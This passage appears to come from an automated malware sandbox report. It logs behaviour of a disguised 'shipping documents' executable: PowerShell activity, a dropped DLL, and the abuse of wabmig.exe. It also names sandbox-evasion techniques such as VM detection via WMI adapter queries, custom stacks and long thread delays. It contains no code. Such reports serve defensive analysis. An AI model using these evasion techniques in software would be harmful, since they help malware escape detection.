            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Switches to a custom stack to bypass stack traces
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeAPI/Special instruction interceptor: Address: 4B055C7
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 24490000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 24340000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599779Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599545Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599435Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599202Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598869Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598761Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598640Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598419Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598185Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598075Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597733Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597622Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597044Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596315Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596076Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595624Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595270Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595154Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595042Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594600Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594375Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7439Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2243Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6104Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3699Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWindow / User API: threadDelayed 3387Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWindow / User API: threadDelayed 6446Jump to behavior
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl39F4.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep count: 7439 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep count: 2243 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -23980767295822402s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7432Thread sleep count: 3387 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7432Thread sleep count: 6446 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -599779s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -599545s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -599435s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -599312s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -599202s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -599093s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -598869s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -598761s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -598640s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -598419s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -598297s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -598185s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -598075s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -597953s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -597843s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -597733s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -597622s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -597500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -597390s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -597044s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -596922s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -596797s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -596687s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -596547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -596437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -596315s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -596076s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -595624s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -595500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -595390s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -595270s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -595154s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -595042s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -594937s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 7396Thread sleep time: -594828s >= -30000sJump to behavior
